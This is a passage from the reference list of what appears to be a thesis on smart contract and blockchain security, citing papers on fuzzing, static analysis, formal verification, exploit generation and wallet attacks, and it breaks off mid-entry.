[106] Amir Dembo, Sreeram Kannan, Ertem Nusret Tas, David Tse, Pramod Viswanath, Xuechao
      Wang, and Ofer Zeitouni. Everything is a race and nakamoto always wins. In Proceedings
      of the 2020 ACM SIGSAC Conference on Computer and Communications Security, pages
      859–878, 2020.
[107] Monika Di Angelo and Gernot Salzer. A survey of tools for analyzing ethereum smart
      contracts. In 2019 IEEE International Conference on Decentralized Applications and In-
      frastructures (DAPPCON), pages 69–78. IEEE, 2019.
[108] Mengjie Ding, Peiru Li, Shanshan Li, and He Zhang. Hfcontractfuzzer: Fuzzing hyperledger
      fabric smart contracts for vulnerability detection. In Evaluation and Assessment in Software
      Engineering, pages 321–328. 2021.
[109] Wang Duo, Huang Xin, and Ma Xiaofeng. Formal analysis of smart contract based on
      colored petri nets. IEEE Intelligent Systems, 35(3):19–30, 2020.
[110] Stefan Dziembowski, Lisa Eckey, Sebastian Faust, and Daniel Malinowski. Perun: Virtual
      payment channels over cryptographic currencies. IACR Cryptol. ePrint Arch., 2017:635,
      2017.
[111] Jacob Eberhardt and Stefan Tai. On or off the blockchain? insights on off-chaining compu-
      tation and data. In European Conference on Service-Oriented and Cloud Computing, pages
      3–15. Springer, 2017.
[112] Joshua Ellul and Gordon J Pace. Runtime verification of ethereum smart contracts. In 2018
      14th European Dependable Computing Conference (EDCC), pages 158–163. IEEE, 2018.
[113] Ethereum. Web3.js. https://web3js.readthedocs.io/en/v1.2.11/web3-eth.html, 2021.
[114] Josselin Feist, Gustavo Grieco, and Alex Groce. Slither: a static analysis framework for
      smart contracts. In 2019 IEEE/ACM 2nd International Workshop on Emerging Trends in
      Software Engineering for Blockchain (WETSEB), pages 8–15. IEEE, 2019.
[115] Yu Feng, Emina Torlak, and Rastislav Bodik. Precise attack synthesis for smart contracts.
      arXiv preprint arXiv:1902.06067, 2019.
[116] Yu Feng, Emina Torlak, and Rastislav Bodik. Summary-based symbolic evaluation for smart
      contracts. In 2020 35th IEEE/ACM International Conference on Automated Software Engi-
      neering (ASE), pages 1141–1152. IEEE, 2020.
[117] Christof Ferreira Torres, Mathis Baden, Robert Norvill, Beltran Borja Fiz Pontiveros, Hugo
      Jonker, and Sjouke Mauw. Ægis: Shielding vulnerable smart contracts against attacks. In
      Proceedings of the 15th ACM Asia Conference on Computer and Communications Security,
      pages 584–597, 2020.
                                                214


[118] Christof Ferreira Torres, Ramiro Camino, et al. Frontrunner jones and the raiders of the dark
      forest: An empirical study of frontrunning on the ethereum blockchain. In USENIX Security
      Symposium, Virtual 11-13 August 2021, 2021.
[119] Christof Ferreira Torres, Antonio Ken Iannillo, Arthur Gervais, et al. Confuzzius: A data
      dependency-aware hybrid fuzzer for smart contracts. 2021.
[120] Christof Ferreira Torres, Antonio Ken Iannillo, Arthur Gervais, et al. The eye of horus:
      Spotting and analyzing attacks on ethereum smart contracts. In International Conference on
      Financial Cryptography and Data Security, Grenada 1-5 March 2021, 2021.
[121] Karoline Figueiredo, Ahmed WA Hammad, Assed Haddad, and Vivian WY Tam. Assess-
      ing the usability of blockchain for sustainability: Extending key themes to the construction
      industry. Journal of Cleaner Production, page 131047, 2022.
[122] Joel Frank, Cornelius Aschermann, and Thorsten Holz. ETHBMC: A bounded model
      checker for smart contracts. In 29th USENIX Security Symposium (USENIX Security 20),
      pages 2757–2774, 2020.
[123] Ernesto Frontera. A History of The DAO Hack. https://coinmarketcap.com/alexandria/
      article/a-history-of-the-dao-hack. Accessed: 2022-02-15.
[124] Anthony Y Fu, Xiaotie Deng, Liu Wenyin, and Greg Little. The methodology and an appli-
      cation to fight against unicode attacks. In Proceedings of the second symposium on Usable
      privacy and security, pages 91–101, 2006.
[125] Ying Fu, Meng Ren, Fuchen Ma, Yu Jiang, Heyuan Shi, and Jiaguang Sun. Evmfuzz: Dif-
      ferential fuzz testing of ethereum virtual machine. arXiv preprint arXiv:1903.08483, 2019.
[126] Ying Fu, Meng Ren, Fuchen Ma, Heyuan Shi, Xin Yang, Yu Jiang, Huizhong Li, and Xiang
      Shi. Evmfuzzer: detect evm vulnerabilities via fuzz testing. In Proceedings of the 2019 27th
      ACM Joint Meeting on European Software Engineering Conference and Symposium on the
      Foundations of Software Engineering, pages 1110–1114, 2019.
[127] Jianbo Gao, Han Liu, Chao Liu, Qingshan Li, Zhi Guan, and Zhong Chen. Easyflow: Keep
      ethereum away from overflow. In 2019 IEEE/ACM 41st International Conference on Soft-
      ware Engineering: Companion Proceedings (ICSE-Companion), pages 23–26. IEEE, 2019.
[128] Daniel E Geer Jr. Complexity is the enemy. IEEE Security & Privacy, 6(6):88–88, 2008.
[129] Serenity Gibbons. 3 practical ways to use blockchain in your business in 2020. Forbes.
[130] Yossi Gilad, Rotem Hemo, Silvio Micali, Georgios Vlachos, and Nickolai Zeldovich. Al-
      gorand: Scaling byzantine agreements for cryptocurrencies. In Proceedings of the 26th
      Symposium on Operating Systems Principles, pages 51–68, 2017.
[131] Andriana Gkaniatsou, Myrto Arapinis, and Aggelos Kiayias. Low-level attacks in bitcoin
      wallets. In International Conference on Information Security, pages 233–253. Springer,
      2017.
                                                215


[132] Dan Goodin. Really stupid “smart contract” bug let hackers steal $31 million in digi-
      tal coin. https://arstechnica.com/information-technology/2021/12/hackers-drain-31-million-
      from-cryptocurrency-service-monox-finance/, 2021.
[133] Neville Grech, Michael Kong, Anton Jurisevic, Lexi Brent, Bernhard Scholz, and Yannis
      Smaragdakis. Madmax: Surviving out-of-gas conditions in ethereum smart contracts. Pro-
      ceedings of the ACM on Programming Languages, 2(OOPSLA):1–27, 2018.
[134] Gustavo Grieco, Will Song, Artur Cygan, Josselin Feist, and Alex Groce. Echidna: effective,
      usable, and fast fuzzing for smart contracts. In Proceedings of the 29th ACM SIGSOFT
      International Symposium on Software Testing and Analysis, pages 557–560, 2020.
[135] Ilya Grishchenko, Matteo Maffei, and Clara Schneidewind. Ethertrust: Sound static analysis
      of ethereum bytecode. Technische Universität Wien, Tech. Rep, 2018.
[136] Ilya Grishchenko, Matteo Maffei, and Clara Schneidewind. A semantic framework for the
      security analysis of ethereum smart contracts. In International Conference on Principles of
      Security and Trust, pages 243–269. Springer, 2018.
[137] Shelly Grossman, Ittai Abraham, Guy Golan-Gueta, Yan Michalevsky, Noam Rinetzky,
      Mooly Sagiv, and Yoni Zohar. Online detection of effectively callback free objects with
      applications to smart contracts. Proceedings of the ACM on Programming Languages,
      2(POPL):1–28, 2017.
[138] Mordechai Guri. Beatcoin: Leaking private keys from air-gapped cryptocurrency wallets.
      In 2018 IEEE International Conference on Internet of Things (iThings). IEEE, 2018.
[139] Gus Gutoski and Douglas Stebila. Hierarchical deterministic bitcoin wallets that tolerate key
      leakage. In International Conference on Financial Cryptography and Data Security, pages
      497–504. Springer, 2015.
[140] Abdelatif Hafid, Abdelhakim Senhaji Hafid, and Mustapha Samih. Scaling blockchains: A
      comprehensive survey. IEEE Access, 8:125244–125262, 2020.
[141] Ákos Hajdu and Dejan Jovanović. solc-verify: A modular verifier for solidity smart con-
      tracts. arXiv preprint arXiv:1907.04262, 2019.
[142] Ákos Hajdu, Dejan Jovanović, and Gabriela Ciocarlie. Formal specification and verification
      of solidity contracts with events (short paper). In 2nd Workshop on Formal Methods for
      Blockchains (FMBC 2020). Schloss Dagstuhl-Leibniz-Zentrum für Informatik, 2020.
[143] Qilong Han, Shuang Liang, and Hongli Zhang. Mobile cloud sensing, big data, and 5g
      networks make an intelligent and smart world. IEEE network, 29(2):40–45, 2015.
[144] Freya Sheer Hardwick, Apostolos Gioulis, Raja Naeem Akram, and Konstantinos Markan-
      tonakis. E-voting with blockchain: An e-voting protocol with decentralisation and voter
      privacy. In 2018 IEEE International Conference on Internet of Things (iThings). IEEE,
      2018.
                                               216


[145] Martie G Haselton, Daniel Nettle, and Damian R Murray. The evolution of cognitive bias.
      The handbook of evolutionary psychology, pages 1–20, 2015.
[146] Jingxuan He, Mislav Balunović, Nodar Ambroladze, Petar Tsankov, and Martin Vechev.
      Learning to fuzz from symbolic execution with application to smart contracts. In Proceed-
      ings of the 2019 ACM SIGSAC Conference on Computer and Communications Security,
      pages 531–548, 2019.
[147] Ningyu He, Ruiyi Zhang, Haoyu Wang, Lei Wu, Xiapu Luo, Yao Guo, Ting Yu, and Xuxian
      Jiang. {EOSAFE}: Security analysis of {EOSIO} smart contracts. In 30th USENIX Security
      Symposium (USENIX Security 21), pages 1271–1288, 2021.
[148] Everett Hildenbrandt, Manasvi Saxena, Nishant Rodrigues, Xiaoran Zhu, Philip Daian,
      Dwight Guth, Brandon Moore, Daejun Park, Yi Zhang, Andrei Stefanescu, et al. Kevm:
      A complete formal semantics of the ethereum virtual machine. In 2018 IEEE 31st Computer
      Security Foundations Symposium (CSF), pages 204–217. IEEE, 2018.
[149] Grant Ho, Asaf Cidon, Lior Gavish, Marco Schweighauser, Vern Paxson, Stefan Savage,
      Geoffrey M Voelker, and David Wagner. Detecting and characterizing lateral phishing at
      scale. In 28th {USENIX} Security Symposium ({USENIX} Security 19), pages 1273–1290,
      2019.
[150] Tobias Holgers, David E Watson, and Steven D Gribble. Cutting through the confusion: A
      measurement study of homograph attacks. In USENIX Annual Technical Conference, pages
      261–266, 2006.
[151] Hang Hu and Gang Wang. End-to-end measurements of email spoofing attacks. In 27th
      {USENIX} Security Symposium ({USENIX} Security 18), pages 1095–1112, 2018.
[152] Teng Hu, Xiaolei Liu, Ting Chen, Xiaosong Zhang, Xiaoming Huang, Weina Niu, Jiazhong
      Lu, Kun Zhou, and Yuan Liu. Transaction-based classification and detection approach for
      ethereum smart contract. Information Processing & Management, 58(2):102462, 2021.
[153] Xinwen Hu, Yi Zhuang, Shang-Wei Lin, Fuyuan Zhang, Shuanglong Kan, and Zining Cao.
      A security type verifier for smart contracts. Computers & Security, page 102343, 2021.
[154] Jianjun Huang, Songming Han, Wei You, Wenchang Shi, Bin Liang, Jingzheng Wu, and Yan-
      jun Wu. Hunting vulnerable smart contracts via graph embedding based bytecode matching.
      IEEE Transactions on Information Forensics and Security, 16:2144–2156, 2021.
[155] Deloitte Insights. Deloitte’s 2019 global blockchain survey. Blockchain Gets Down to Busi-
      ness. Deloitte, 2019.
[156] Nikolay Ivanov, Hanqing Guo, and Qiben Yan. Rectifying administrated erc20 tokens.
      In International Conference on Information and Communications Security, pages 22–37.
      Springer, 2021.
[157] Nikolay Ivanov, Chenning Li, Qiben Yan, Zhiyuan Sun, Zhichao Cao, and Xiapu Luo. Se-
      curity threat mitigation for smart contracts: A survey, 2023.
                                                217


[158] Nikolay Ivanov, Jianzhi Lou, Ting Chen, Jin Li, and Qiben Yan. Targeting the weakest link:
      Social engineering attacks in ethereum smart contracts. In Proceedings of the 2021 ACM
      Asia Conference on Computer and Communications Security, pages 787–801, 2021.
[159] Nikolay Ivanov, Jianzhi Lou, and Qiben Yan. Smart wifi: Universal and secure smart
      contract-enabled wifi hotspot. In International Conference on Security and Privacy in Com-
      munication Systems, pages 425–445. Springer, 2020.
[160] Nikolay Ivanov and Qiben Yan. Ethclipper: A clipboard meddling attack on hardware wal-
      lets with address verification evasion. In 2021 IEEE Conference on Communications and
      Network Security (CNS), pages 191–199, 2021.
[161] Nikolay Ivanov, Qiben Yan, and Anurag Kompalli. Txt: Real-time transaction encapsulation
      for ethereum smart contracts. IEEE Transactions on Information Forensics and Security,
      18:1141–1155, 2023.
[162] Nikolay Ivanov, Qiben Yan, and Qingyang Wang. Blockumulus: a scalable framework for
      smart contracts on the cloud. In 2021 IEEE 41st International Conference on Distributed
      Computing Systems (ICDCS), pages 607–617. IEEE, 2021.
[163] Bo Jiang, Ye Liu, and WK Chan. Contractfuzzer: Fuzzing smart contracts for vulnerability
      detection. In ASE. IEEE, 2018.
[164] Tigang Jiang, Hua Fang, and Honggang Wang. Blockchain-based internet of vehicles: Dis-
      tributed network architecture and performance analysis. IEEE Internet of Things Journal,
      6(3):4640–4649, 2018.
[165] Jiao Jiao, Shuanglong Kan, Shang-Wei Lin, David Sanan, Yang Liu, and Jun Sun. Semantic
      understanding of smart contracts: executable operational semantics of solidity. In 2020 IEEE
      Symposium on Security and Privacy (SP), pages 1695–1712. IEEE, 2020.
[166] Ling Jin, Yinzhi Cao, Yan Chen, Di Zhang, and Simone Campanoni. Exgen: Cross-platform,
      automated exploit generation for smart contract vulnerabilities. IEEE Transactions on De-
      pendable and Secure Computing, 2022.
[167] Harry Kalodner, Steven Goldfeder, Xiaoqi Chen, S Matthew Weinberg, and Edward W Fel-
      ten. Arbitrum: Scalable, private smart contracts. In 27th {USENIX} Security Symposium
      ({USENIX} Security 18), pages 1353–1370, 2018.
[168] Sukrit Kalra, Seep Goel, Mohan Dhawan, and Subodh Sharma. Zeus: Analyzing safety of
      smart contracts. In Ndss, pages 1–12, 2018.
[169] Andreas Kappes, Ann H Harvey, Terry Lohrenz, P Read Montague, and Tali Sharot. Confir-
      mation bias in the utilization of others’ opinion strength. Nature neuroscience, 23(1):130–
      137, 2020.
[170] Daniel Karrenberg, Mark A. Kosters, Raymond Plzak, and Randy Bush. Root Name Server
      Operational Requirements. RFC 2870, June 2000.
                                                218


[171] Jonathan Katz and Yehuda Lindell. Introduction to modern cryptography. CRC press, 2020.
[172] Abdul Ghaffar Khan, Amjad Hussain Zahid, Muzammil Hussain, and Usama Riaz. Security
      of cryptocurrency using hardware wallet and qr code. In 2019 International Conference on
      Innovative Computing (ICIC), pages 1–10. IEEE, 2019.
[173] Aggelos Kiayias, Alexander Russell, Bernardo David, and Roman Oliynykov. Ouroboros:
      A provably secure proof-of-stake blockchain protocol. In Annual International Cryptology
      Conference, pages 357–388. Springer, 2017.
[174] James C King. Symbolic execution and program testing. Communications of the ACM,
      19(7):385–394, 1976.
[175] Eleftherios Kokoris-Kogias, Philipp Jovanovic, Linus Gasser, Nicolas Gailly, Ewa Syta, and
      Bryan Ford. Omniledger: A secure, scale-out, decentralized ledger via sharding. In 2018
      IEEE Symposium on Security and Privacy (SP), pages 583–598. IEEE, 2018.
[176] Aashish Kolluri, Ivica Nikolic, Ilya Sergey, Aquinas Hobor, and Prateek Saxena. Exploiting
      the laws of order in smart contracts. In Proceedings of the 28th ACM SIGSOFT international
      symposium on software testing and analysis, pages 363–373, 2019.
[177] Jaturong Kongmanee, Phongphun Kijsanayothin, and Rattikorn Hewett. Securing smart
      contracts in blockchain. In 2019 34th IEEE/ACM International Conference on Automated
      Software Engineering Workshop (ASEW), pages 69–76. IEEE, 2019.
[178] Johannes Krupp and Christian Rossow. teether: Gnawing at ethereum to automatically ex-
      ploit smart contracts. In 27th USENIX Security Symposium (USENIX Security 18), pages
      1317–1333, 2018.
[179] Murat Kuzlu, Manisa Pipattanasomporn, Levent Gurses, and Saifur Rahman. Performance
      analysis of a hyperledger fabric blockchain framework: throughput, latency and scalability.
      In 2019 IEEE international conference on blockchain (Blockchain), pages 536–540. IEEE,
      2019.
[180] Yujin Kwon, Jian Liu, Minjeong Kim, Dawn Song, and Yongdae Kim. Impossibility of full
      decentralization in permissionless blockchains. In Proceedings of the 1st ACM Conference
      on Advances in Financial Technologies, 2019.
[181] Heiner Lasi, Peter Fettke, Hans-Georg Kemper, Thomas Feld, and Michael Hoffmann. In-
      dustry 4.0. Business & information systems engineering, 6(4):239–242, 2014.
[182] Ton Chanh Le, Lei Xu, Lin Chen, and Weidong Shi. Proving conditional termination for
      smart contracts. In Proceedings of the 2nd ACM Workshop on Blockchains, Cryptocurren-
      cies, and Contracts, pages 57–59, 2018.
[183] Ao Li, Jemin Andrew Choi, and Fan Long. Securing smart contract with runtime validation.
      In Proceedings of the 41st ACM SIGPLAN Conference on Programming Language Design
      and Implementation, pages 438–453, 2020.
                                                 219


[184] Chenning Li, Zhichao Cao, and Yunhao Liu. Deep ai enabled ubiquitous wireless sensing:
      A survey. ACM Computing Surveys (CSUR), 54(2):1–35, 2021.
[185] Xiaoqi Li, Peng Jiang, Ting Chen, Xiapu Luo, and Qiaoyan Wen. A survey on the security
      of blockchain systems. Future Generation Computer Systems, 107:841–853, 2020.
[186] Xiaoyu Li, Cheng Su, Yan Xiong, Wenchao Huang, and Wansen Wang. Formal verification
      of bnb smart contract. In 2019 5th International Conference on Big Data Computing and
      Communications (BIGCOM), pages 74–78. IEEE, 2019.
[187] Yue Li. Finding concurrency exploits on smart contracts. In 2019 IEEE/ACM 41st Interna-
      tional Conference on Software Engineering: Companion Proceedings (ICSE-Companion),
      pages 144–146. IEEE, 2019.
[188] Yue Li, Han Liu, Zhiqiang Yang, Qian Ren, Lei Wang, and Bangdao Chen. Safepay on
      ethereum: A framework for detecting unfair payments in smart contracts. In 2020 IEEE
      40th International Conference on Distributed Computing Systems (ICDCS), pages 1219–
      1222. IEEE, 2020.
[189] Jian-Wei Liao, Tsung-Ta Tsai, Chia-Kang He, and Chin-Wei Tien. Soliaudit: Smart contract
      vulnerability assessment based on machine learning and fuzz testing. In 2019 Sixth Inter-
      national Conference on Internet of Things: Systems, Management and Security (IOTSMS),
      pages 458–465. IEEE, 2019.
[190] Jun Lin, Zhiqi Shen, Anting Zhang, and Yueting Chai. Blockchain and iot based food trace-
      ability for smart agriculture. In Proceedings of the 3rd International Conference on Crowd
      Science and Engineering, pages 1–6, 2018.
[191] Shlomi Linoy, Suprio Ray, and Natalia Stakhanova. Etherprov: provenance-aware detection,
      analysis, and mitigation of ethereum smart contract security issues.
[192] Changwei Liu and Sid Stamm. Fighting unicode-obfuscated spam. In Proceedings of the
      anti-phishing working groups 2nd annual eCrime researchers summit, pages 45–59, 2007.
[193] Chao Liu, Han Liu, Zhao Cao, Zhong Chen, Bangdao Chen, and Bill Roscoe. Reguard: find-
      ing reentrancy bugs in smart contracts. In 2018 IEEE/ACM 40th International Conference
      on Software Engineering: Companion (ICSE-Companion), pages 65–68. IEEE, 2018.
[194] Han Liu, Chao Liu, Wenqi Zhao, Yu Jiang, and Jiaguang Sun. S-gram: towards semantic-
      aware security auditing for ethereum smart contracts. In 2018 33rd IEEE/ACM International
      Conference on Automated Software Engineering (ASE), pages 814–819. IEEE, 2018.
[195] Hong Liu, Huansheng Ning, Qitao Mu, Yumei Zheng, Jing Zeng, Laurence T Yang, Runhe
      Huang, and Jianhua Ma. A review of the smart world. Future generation computer systems,
      96:678–691, 2019.
[196] Ye Liu, Yi Li, Shang-Wei Lin, and Qiang Yan. Modcon: A model-based testing platform
      for smart contracts. In Proceedings of the 28th ACM Joint Meeting on European Software
      Engineering Conference and Symposium on the Foundations of Software Engineering, pages
      1601–1605, 2020.
                                               220


[197] Zhenguang Liu, Peng Qian, Xiang Wang, Lei Zhu, Qinming He, and Shouling Ji. Smart
      contract vulnerability detection: From pure neural network to interpretable graph feature
      and expert pattern fusion. arXiv preprint arXiv:2106.09282, 2021.
[198] Ning Lu, Bin Wang, Yongxin Zhang, Wenbo Shi, and Christian Esposito. Neucheck: A more
      practical ethereum smart contract security analysis tool. Software: Practice and Experience,
      2019.
[199] Oliver Lutz, Huili Chen, Hossein Fereidooni, Christoph Sendner, Alexandra Dmitrienko,
      Ahmad Reza Sadeghi, and Farinaz Koushanfar. Escort: Ethereum smart contracts vul-
      nerability detection using deep neural network and transfer learning. arXiv preprint
      arXiv:2103.12607, 2021.
[200] Loi Luu, Duc-Hiep Chu, Hrishi Olickel, Prateek Saxena, and Aquinas Hobor. Making smart
      contracts smarter. In Proceedings of the 2016 ACM SIGSAC conference on computer and
      communications security, pages 254–269, 2016.
[201] M-Lab. Measurement lab speed test. https://speed.measurementlab.net, 2019. Accessed:
      2020-04-03.
[202] Fuchen Ma, Ying Fu, Meng Ren, Wanting Sun, Zhe Liu, Yu Jiang, Jun Sun, and Jiaguang
      Sun. Gasfuzz: Generating high gas consumption inputs to avoid out-of-gas vulnerability.
      arXiv preprint arXiv:1910.02945, 2019.
[203] Fuchen Ma, Ying Fu, Meng Ren, Mingzhe Wang, Yu Jiang, Kaixiang Zhang, Huizhong Li,
      and Xiang Shi. Evm*: from offline detection to online reinforcement for ethereum virtual
      machine. In 2019 IEEE 26th International Conference on Software Analysis, Evolution and
      Reengineering (SANER), pages 554–558. IEEE, 2019.
[204] Matteo Marescotti, Rodrigo Otoni, Leonardo Alt, Patrick Eugster, Antti EJ Hyvärinen, and
      Natasha Sharygina. Accurate smart contract verification through direct modelling. In In-
      ternational Symposium on Leveraging Applications of Formal Methods, pages 178–194.
      Springer, 2020.
[205] Anastasia Mavridou and Aron Laszka. Designing secure ethereum smart contracts: A finite
      state machine based approach. In International Conference on Financial Cryptography and
      Data Security, pages 523–540. Springer, 2018.
[206] Anastasia Mavridou, Aron Laszka, Emmanouela Stachtiari, and Abhishek Dubey. Verisolid:
      Correct-by-design smart contracts for ethereum. In International Conference on Financial
      Cryptography and Data Security, pages 446–465. Springer, 2019.
[207] Muhammad Izhar Mehar, Charles Louis Shier, Alana Giambattista, Elgar Gong, Gabrielle
      Fletcher, Ryan Sanayhie, Henry M Kim, and Marek Laskowski. Understanding a revolu-
      tionary and flawed grand experiment in blockchain: the dao attack. Journal of Cases on
      Information Technology (JCIT), 21(1):19–32, 2019.
                                               221


[208] Simon Meier, Benedikt Schmidt, Cas Cremers, and David Basin. The tamarin prover for
      the symbolic analysis of security protocols. In International Conference on Computer Aided
      Verification, pages 696–701. Springer, 2013.
[209] Marvin Lee Minsky. Computation. Prentice-Hall Englewood Cliffs, 1967.
[210] Ricky KP Mok, Xiapu Luo, Edmond WW Chan, and Rocky KC Chang. Qdash: a qoe-aware
      dash system. In Proceedings of the 3rd Multimedia Systems Conference, pages 11–22, 2012.
[211] Andreas F. Molisch. Wireless Communications. Second Edition, chapter 1, page 14. John
      Wiley & Sons, 2011.
[212] Pouyan Momeni, Yu Wang, and Reza Samavi. Machine learning model for smart contracts
      security analysis. In 2019 17th International Conference on Privacy, Security and Trust
      (PST), pages 1–6. IEEE, 2019.
[213] Md Moniruzzaman, Farida Chowdhury, and Md Sadek Ferdous. Examining usability is-
      sues in blockchain-based cryptocurrency wallets. In Cyber Security and Computer Science:
      Second EAI International Conference, ICONCS 2020, Dhaka, Bangladesh, February 15-16,
      2020, Proceedings 2, pages 631–643. Springer, 2020.
[214] Mark Mossberg, Felipe Manzano, Eric Hennenfent, Alex Groce, Gustavo Grieco, Josselin
      Feist, Trent Brunson, and Artem Dinaburg. Manticore: A user-friendly symbolic execution
      framework for binaries and smart contracts. In 2019 34th IEEE/ACM International Confer-
      ence on Automated Software Engineering (ASE), pages 1186–1189. IEEE, 2019.
[215] Bernhard Mueller. Smashing ethereum smart contracts for fun and real profit. In 9th Annual
      HITB Security Conference (HITBSecConf), volume 54, 2018.
[216] Satoshi Nakamoto. Bitcoin: A peer-to-peer electronic cash system. Technical report, 2019.
[217] Zeinab Nehai, Pierre-Yves Piriou, and Frederic Daumas. Model-checking of smart con-
      tracts. In 2018 IEEE International Conference on Internet of Things (iThings) and IEEE
      Green Computing and Communications (GreenCom) and IEEE Cyber, Physical and Social
      Computing (CPSCom) and IEEE Smart Data (SmartData), pages 980–987. IEEE, 2018.
[218] Ajaya Neupane, Md Lutfor Rahman, Nitesh Saxena, and Leanne Hirshfield. A multi-modal
      neuro-physiological study of phishing detection and malware warnings. In Proceedings of
      the 22nd ACM SIGSAC Conference on Computer and Communications Security, pages 479–
      491, 2015.
[219] Ajaya Neupane, Nitesh Saxena, Keya Kuruvilla, Michael Georgescu, and Rajesh K Kana.
      Neural signatures of user-centered security: An fmri study of phishing, and malware warn-
      ings. In NDSS, 2014.
[220] Tai D Nguyen, Long H Pham, and Jun Sun. sguard: Towards fixing vulnerable smart con-
      tracts automatically. arXiv preprint arXiv:2101.01917.
                                               222


[221] Tai D Nguyen, Long H Pham, Jun Sun, Yun Lin, and Quang Tran Minh. sfuzz: An effi-
      cient adaptive fuzzer for solidity smart contracts. In Proceedings of the ACM/IEEE 42nd
      International Conference on Software Engineering, pages 778–788, 2020.
[222] Yuandong NI, Chao ZHANG, and Tingting YIN. A survey of smart contract vulnerability
      research. Journal of Cyber Security, 5(3):78–99, 2020.
[223] Ivica Nikolić, Aashish Kolluri, Ilya Sergey, Prateek Saxena, and Aquinas Hobor. Finding
      the greedy, prodigal, and suicidal contracts at scale. In Proceedings of the 34th Annual
      Computer Security Applications Conference, pages 653–663, 2018.
[224] Robert Norvill, Beltran Borja Fiz Pontiveros, Radu State, and Andrea Cullen. Visual emula-
      tion for ethereum’s virtual machine. In NOMS 2018-2018 IEEE/IFIP Network Operations
      and Management Symposium, pages 1–4. IEEE, 2018.
[225] LLC. Ookla. Ookla lab speed test. https://www.speedtest.net, 2019. Accessed: 2020-04-03.
[226] Santiago Palladino. The parity wallet hack explained.       https://blog.zeppelin.solutions/
      on-the-parity-wallet-multisig-hack-405a8c12e8f7, 2017.
[227] Daejun Park, Yi Zhang, Manasvi Saxena, Philip Daian, and Grigore Roşu. A formal verifi-
      cation tool for ethereum vm bytecode. In ACM ESEC/FSE, pages 912–915, 2018.
[228] Daniel Perez and Ben Livshits. Smart contract vulnerabilities: Vulnerable does not imply
      exploited. In 30th USENIX Security Symposium (USENIX Security 21), 2021.
[229] Daniel Perez and Benjamin Livshits. Smart contract vulnerabilities: Does anyone care?
      arXiv preprint arXiv:1902.06710, 2019.
[230] Anton Permenev, Dimitar Dimitrov, Petar Tsankov, Dana Drachsler-Cohen, and Martin
      Vechev. Verx: Safety verification of smart contracts. In 2020 IEEE Symposium on Secu-
      rity and Privacy (SP), pages 1661–1677. IEEE, 2020.
[231] Joseph Poon and Vitalik Buterin. Plasma: Scalable autonomous smart contracts. White
      paper, pages 1–47, 2017.
[232] Joseph Poon and Thaddeus Dryja. The bitcoin lightning network: Scalable off-chain instant
      payments, 2016.
[233] Purathani Praitheeshan, Lei Pan, Jiangshan Yu, Joseph Liu, and Robin Doss. Security
      analysis methods on ethereum smart contract vulnerabilities: a survey. arXiv preprint
      arXiv:1908.08605, 2019.
[234] Ravi Prasad, Constantinos Dovrolis, Margaret Murray, and KC Claffy. Bandwidth estima-
      tion: metrics, measurement techniques, and tools. IEEE network, 17(6):27–35, 2003.
[235] Kaihua Qin, Liyi Zhou, and Arthur Gervais. Quantifying blockchain extractable value: How
      dark is the forest? arXiv preprint arXiv:2101.05511, 2021.
                                               223


[236] Lijin Quan, Lei Wu, and Haoyu Wang. Evulhunter: detecting fake transfer vulnerabilities
      for eosio’s smart contracts at webassembly-level. arXiv preprint arXiv:1906.10362, 2019.
[237] Aravind Ramachandran and Murat Kantarcioglu.              Smartprovenance: a distributed,
      blockchain based dataprovenance system. In Proceedings of the Eighth ACM Conference
      on Data and Application Security and Privacy, pages 35–42, 2018.
[238] Ana Reyna, Cristian Martín, Jaime Chen, Enrique Soler, and Manuel Díaz. On blockchain
      and its integration with iot. challenges and opportunities. Future generation computer sys-
      tems, 88:173–190, 2018.
[239] Hubert Ritzdorf, Karl Wüst, Arthur Gervais, Guillaume Felley, and Srdjan Capkun. Tls-n:
      Non-repudiation over tls enablign ubiquitous content signing. In NDSS, 2018.
[240] Michael Rodler, Wenting Li, Ghassan O Karame, and Lucas Davi. Sereum: Protecting
      existing smart contracts against re-entrancy attacks. arXiv preprint arXiv:1812.05934, 2018.
[241] Michael Rodler, Wenting Li, Ghassan O Karame, and Lucas Davi. Evmpatch: timely and
      automated patching of ethereum smart contracts. In 30th USENIX Security Symposium
      (USENIX Security 21), 2021.
[242] Jan Rubin. Clipsa - Multipurpose password stealer. https://decoded.avast.io/janrubin/
      clipsa-multipurpose-password-stealer/, 2019. Accessed: 2021-04-12.
[243] Sanjay K Sahay, Ashu Sharma, and Hemant Rathore. Evolution of malware and its detection
      techniques. In Information and Communication Technology for Sustainable Development,
      pages 139–150. Springer, 2020.
[244] Justin Sahs and Latifur Khan. A machine learning approach to android malware detection.
      In 2012 European Intelligence and Security Informatics Conference, pages 141–147. IEEE,
      2012.
[245] Noama Fatima Samreen and Manar H. Alalfi. A survey of security vulnerabilities in
      ethereum smart contracts. CoRR, abs/2105.06974, 2021.
[246] Manuel San Pedro, Victor Servant, and Charles Guillemet. Side-channel assessment of open
      source hardware wallets. IACR Cryptol. ePrint Arch., 2019.
[247] Mahmoud Sayrafiezadeh.         The birthday problem revisited.       Mathematics Magazine,
      67(3):220–223, 1994.
[248] Clara Schneidewind, Ilya Grishchenko, Markus Scherer, and Matteo Maffei. ethor: Practical
      and provably sound static analysis of ethereum smart contracts. In ACM CCS, 2020.
[249] Franklin Schrans, Susan Eisenbach, and Sophia Drossopoulou. Writing safe smart contracts
      in flint. In Conference companion of the 2nd international conference on art, science, and
      engineering of programming, pages 218–219, 2018.
                                                224


[250] Amazon Web Services. Alexa top sites.
      https://docs.aws.amazon.com/AlexaTopSites/latest/MakingRequestsChapter.html.           Ac-
      cessed: 2020-04-03.
[251] Pradip Kumar Sharma and Jong Hyuk Park. Blockchain based hybrid network architecture
      for the smart city. Future Generation Computer Systems, 86:650–655, 2018.
[252] Fengrui Shi, Zhijin Qin, and Julie A McCann. Oppay: Design and implementation of a
      payment system for opportunistic data services. In 2017 IEEE 37th International Conference
      on Distributed Computing Systems (ICDCS), pages 1618–1628. IEEE, 2017.
[253] Yonghee Shin and Laurie Williams. An empirical model to predict security vulnerabilities
      using code complexity metrics. In Proceedings of the Second ACM-IEEE international sym-
      posium on Empirical software engineering and measurement, pages 315–317, 2008.
[254] Yonghee Shin and Laurie Williams. Is complexity really the enemy of software security? In
      Proceedings of the 4th ACM workshop on Quality of protection, pages 47–50, 2008.
[255] MacKenzie Sigalos. Bug puts $162 million up for grabs, says founder of defi platform
      compound. https://www.cnbc.com/2021/10/03/162-million-up-for-grabs-after-bug-in-defi-
      protocol-compound-.html, 2021.
[256] Christopher Signer. Gas cost analysis for ethereum smart contracts. Master’s thesis, ETH
